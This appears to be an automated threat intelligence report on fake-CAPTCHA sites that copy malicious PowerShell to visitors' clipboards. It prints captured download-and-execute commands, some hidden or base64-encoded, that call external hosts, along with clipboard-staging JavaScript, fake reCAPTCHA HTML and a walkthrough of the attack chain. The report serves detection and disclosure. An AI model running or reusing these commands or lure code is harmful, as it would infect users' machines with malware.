Threat Intelligence Report

📅 April 22, 2025 🕒 Generated: 2025-04-22 21:03:40 🔍 Sites Analyzed: 33
  • Total Sites Analyzed: 33
  • Malicious Sites: 25 (76.0% detection rate)
  • PowerShell Commands: 25
  • Clipboard Hijacks: 73
  • Avg Threat Score: 90

Attack Pattern Analysis

  • High Risk Commands: 49
  • Base64 Encoded: 20
  • Obfuscated JS: 0
  • Inline JS Redirects: 0
  • External JS Chains: 0
  • Redirect Follows: 0

  • PowerShellCommands: 25
  • EncodedPowerShell: 0
  • ClipboardManipulation: 49
  • ObfuscatedJavaScript: 0
  • Base64Strings: 20
  • JavaScriptRedirects: 0
  • JavaScriptRedirectChains: 0
  • RedirectFollows: 0
  • CaptchaElements: 340

Top Indicators/Keywords

  • <script> (25)
  • ✅ (24)
  • I am not a robot (24)
  • reCAPTCHA Verification (24)
  • I'm not a robot (24)
  • To better prove you are not a robot (23)
  • Verification ID (21)
  • Verify You Are Human (20)
  • Verification Hash (3)
  • Command (1)

Malicious Sites Detected

  • powershell: 2
  • clipboard: 3
  • downloads: 1
  • captcha: 14
  • high risk commands: 2

💻 PowerShell Commands 2

powershell " + htaPath;
iex (irm 'https://aatox.com/verify/45.ps1')

🔍 Suspicious Keywords 8

Command
I am not a robot
Verification Hash
reCAPTCHA Verification
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://aatox.com/verify/45.ps1

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

  • powershell: 2
  • clipboard: 3
  • downloads: 3
  • captcha: 14
  • high risk commands: 4

💻 PowerShell Commands 2

powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\"";
powershell " + htaPath;

🔍 Suspicious Keywords 7

I am not a robot
Verification Hash
reCAPTCHA Verification
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...

  • powershell: 1
  • clipboard: 3
  • downloads: 3
  • captcha: 14
  • high risk commands: 3

💻 PowerShell Commands 1

powershell " + htaPath;

🔍 Suspicious Keywords 7

I am not a robot
Verification Hash
reCAPTCHA Verification
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://yogasitesdev.wpengine.com/2/15.ps1

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...

  • powershell: 1
  • clipboard: 3
  • downloads: 1
  • captcha: 12
  • base64: 1
  • high risk commands: 2

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

  • powershell: 1
  • clipboard: 3
  • downloads: 1
  • captcha: 12
  • base64: 1
  • high risk commands: 2

💻 PowerShell Commands 1

PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

Showing top 20 malicious sites. 5 additional sites detected.

Technical Analysis

ClickGrab Threat Analysis Report - 2025-04-22

Most Common External Domains

  • www.google.com: 35 occurrences
  • use.fontawesome.com: 24 occurrences
  • cdnjs.cloudflare.com: 20 occurrences
  • staplebrokenmetaliyro.blogspot.com: 15 occurrences
  • www.blogger.com: 13 occurrences
  • www.webgo.de: 10 occurrences
  • www.w3.org: 6 occurrences
  • t.me: 5 occurrences
  • browser.certif-update.website: 2 occurrences
  • www.blogblog.com: 2 occurrences

Common Pattern Analysis

reCAPTCHA imagery (24 occurrences, 1 distinct URLs)

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (24 times)

Font resources (44 occurrences, 2 distinct URLs)

  • https://use.fontawesome.com/releases/v5.0.0/css/all.css (24 times)
  • https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (20 times)

CDN hosted scripts (21 occurrences, 2 distinct URLs)

  • https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (20 times)
  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)

Google resources (37 occurrences, 8 distinct URLs)

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (24 times)
  • https://www.google.com/intl/en/policies/privacy/ (4 times)
  • https://www.google.com/intl/en/policies/terms/ (4 times)
  • http://www.google.com/2005/gml/b (1 times)
  • http://www.google.com/2005/gml/data (1 times)
  • ...and 3 more distinct URLs

JavaScript Clipboard Analysis

Found clipboard manipulation code snippets in 48 places

document.execCommand copy

Found in 48 snippets (100.0% of clipboard code)

Examples:

document.execCommand("copy")

textarea manipulation

Found in 48 snippets (100.0% of clipboard code)

Fake CAPTCHA HTML Examples

Here's how the fake CAPTCHA verification appears in HTML:

Example 1:

<div class="recaptcha-box">
            <h2>Verify You Are Human</h2>
            <p>Please verify that you are a human to continue.</p>
<div class="container m-p">    
        <div id="checkbox-window" class="checkbox-window m-p block">
            <div class="checkbox-container m-p">
                <button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
            </div>


Command Context Analysis

Found 27 PowerShell download context snippets

stageClipboard Function

Found 20 references to stageClipboard function

Example stageClipboard contexts:

Example 1:

...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...

Example 2:

...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`; stageClipboard(commandToRun, verification_id); }...


Malicious Commands

Found 4 commandToRun declarations

Malicious commands being prepared for clipboard:

Example 1:

Command:

powershell 

Context:

WindowStyle Hidden -Command \"iex (irm 'https://aatox.com/verify/45.ps1')\""; const commandToRun = "powershell " + htaP...

Example 2:

Command:

powershell 

Context:

 = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...

Example 3:

Command:

powershell 

Context:

...idden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...

Example 4:

Command:

powershell 

Context:

 = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...

PowerShell Parameters

Found 2 htaPath declarations

Malicious PowerShell parameters:

Example 1:

Parameters:

-w hidden -c \

Context:

...d; const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaP

Example 2:

Parameters:

-w hidden -c \

Context:

...const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...

Clipboard Attack Pattern Analysis

Based on the data analyzed, here's the complete clipboard attack pattern:

1. Initial Victim Engagement

The victim is shown a fake CAPTCHA verification UI with Google reCAPTCHA branding.

Common elements found:

  • Google reCAPTCHA logo image
  • Font resources from CDNs
  • "I am not a robot" checkbox

Example Fake CAPTCHA HTML:

<div class="recaptcha-box">
            <h2>Verify You Are Human</h2>
            <p>Please verify that you are a human to continue.</p>
<div class="container m-p">    
        <div id="checkbox-window" class="checkbox-window m-p block">
            <div class="checkbox-container m-p">
                <button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
            </div>...

2. Malicious Code Preparation

When the user clicks the verification checkbox:

  • A 'commandToRun' variable is set with a malicious PowerShell command
  • The command is typically obfuscated and often downloads second-stage payloads
  • Common download destinations include:

Example Command Preparation Code:

WindowStyle Hidden -Command \"iex (irm 'https://aatox.com/verify/45.ps1')\""; const commandToRun = "powershell " + htaP...

3. Clipboard Hijacking

The malicious command is copied to the user's clipboard:

  • A temporary textarea element is created
  • The command is combined with verification text like "[CHECKMARK] I am not a robot"
  • document.execCommand("copy") is used to copy to clipboard
  • The temporary element is removed from the DOM

4. Social Engineering Component

The user sees a success message:

  • The verification UI shows success with a checkmark symbol
  • User is told they've passed verification
  • The clipboard now contains the malicious command + verification text

5. Attack Objective

Final stage of the attack:

  • The user pastes the clipboard contents elsewhere (for example, into a terminal)
  • They see what looks like verification text
  • The PowerShell command at the start of the pasted text gets executed
  • This downloads and runs additional malware from attacker-controlled servers

Reconstructed Attack Example

What's copied to clipboard:

powershell  # [CHECKMARK] 'I am not a robot - reCAPTCHA Verification Hash: XY12Z345'

What user sees when pasting: A verification success message

What actually happens: PowerShell executes the hidden malicious command

Conclusion

This is a sophisticated social engineering attack that tricks users into:

  1. Thinking they're completing a legitimate CAPTCHA
  2. Unknowingly copying malicious code to their clipboard
  3. Executing malware when they paste what they think is just verification text

Statistics

  • Total sites analyzed: 33
  • Sites with malicious content: 24
  • Total unique domains: 19
  • Total URLs extracted: 142